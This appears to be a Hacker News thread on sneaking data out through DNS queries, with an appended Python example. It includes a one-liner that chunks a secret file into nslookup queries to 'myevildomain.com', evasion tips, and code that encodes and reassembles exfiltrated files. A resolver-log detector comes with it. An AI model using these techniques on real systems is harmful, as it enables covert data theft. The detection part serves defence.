Hacker News
by goatinaboat 2098 days ago
you'd be able to `nslookup foo.com <your special server>` on

You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.


Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.

The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).

It was slow though... I think I maxed out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web surfing.

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server

It's even easier than that if you just want to sneak a relatively small file out.

    # -w0 keeps the base64 on one line so sed cuts clean 63-char labels (the DNS label limit); $i numbers the chunks so they can be reordered at the far end
    i=0; for n in $(base64 -w0 mysecretfile | sed 's/.\{63\}/&\n/g'); do nslookup $i.$n.myevildomain.com; i=$((i+1)); done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
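Both ends of the trick in the comment above, as an added example that is not from the thread: the sender's chunking, the receiver pulling the chunks back out of the authoritative server's query log, and the check a defender can run over the local resolver's log. It is my code, not the commenter's. It assumes BIND-style "client ip#port: query: name IN type" log lines (the lines below are constructed), keeps the `myevildomain.com` name from the one-liner, and deliberately departs from it in two ways: base32 instead of base64, because DNS names are case-insensitive and some resolvers randomise the case of outgoing queries, and a sequence-number label, so the receiver can reorder chunks and a caching resolver cannot fold two identical chunks into one upstream query.

```python
import base64
import re
from collections import defaultdict

# Assumptions (not from the thread): attacker-controlled zone from the
# one-liner above, BIND-style query log lines, constructed sample data.
EVIL_DOMAIN = "myevildomain.com"
MAX_LABEL = 63  # RFC 1035: a single label is at most 63 octets


def encode_chunks(data: bytes, domain: str = EVIL_DOMAIN) -> list:
    """Sender side: turn a file into query names, one chunk per name.

    base32 (lower-cased) survives case folding, which base64 would not, and the
    leading numeric label lets the receiver reorder and de-duplicate chunks.
    """
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    chunks = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    return [f"{n}.{chunk}.{domain}" for n, chunk in enumerate(chunks)]


QUERY_RE = re.compile(
    r"client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def reassemble(log_lines, domain: str = EVIL_DOMAIN) -> bytes:
    """Receiver side: rebuild the file from the authoritative server's query log."""
    suffix = "." + domain
    pieces = {}
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m or not m.group("qname").lower().endswith(suffix):
            continue
        labels = m.group("qname")[:-len(suffix)].split(".")
        if len(labels) != 2 or not labels[0].isdigit():
            continue
        pieces[int(labels[0])] = labels[1].upper()  # a retried chunk just overwrites itself
    text = "".join(pieces[n] for n in sorted(pieces))
    text += "=" * (-len(text) % 8)  # restore the base32 padding stripped by the sender
    return base64.b32decode(text)


def flag_exfil(log_lines, min_unique: int = 20, min_mean_len: int = 30) -> list:
    """Defender side: per (client, domain), count distinct subdomains and their
    length. Many long, never-repeated names under one domain is the mark this
    one-liner leaves in resolver logs; random sleeps slow it down but do not
    change it. Returns (client, domain, distinct_subdomains) for each hit."""
    seen = defaultdict(set)
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        labels = m.group("qname").lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue
        domain = ".".join(labels[-2:])  # crude registered-domain guess; use a PSL lookup in practice
        seen[(m.group("src"), domain)].add(".".join(labels[:-2]))
    flagged = []
    for (src, domain), subs in seen.items():
        mean_len = sum(len(s) for s in subs) / len(subs)
        if len(subs) >= min_unique and mean_len >= min_mean_len:
            flagged.append((src, domain, len(subs)))
    return sorted(flagged)


SECRET = b"db_password=hunter2\n" * 50  # constructed payload, 1000 bytes -> 26 chunks


def sample_log() -> list:
    """Constructed resolver log: a little benign traffic plus the exfil run,
    with one retried chunk and the lines delivered out of order."""
    benign = [
        "client 10.0.0.7#51002: query: www.example.org IN A +",
        "client 10.0.0.7#51003: query: mail.example.org IN MX +",
        "client 10.0.0.5#49152: query: cdn.example.net IN AAAA +",
    ]
    exfil = [f"client 10.0.0.5#{40000 + i}: query: {name} IN A +"
             for i, name in enumerate(encode_chunks(SECRET))]
    exfil.append(exfil[3])
    exfil.reverse()
    return benign + exfil


if __name__ == "__main__":
    log = sample_log()
    print("recovered:", reassemble(log) == SECRET)
    print("flagged:", flag_exfil(log))
```

The detector is a rough heuristic, not a signature: a CDN or anti-virus vendor that hangs unique hashes off one domain will trip the same counters, so in practice it is a triage list to combine with the destination domain's age and reputation rather than an alert on its own.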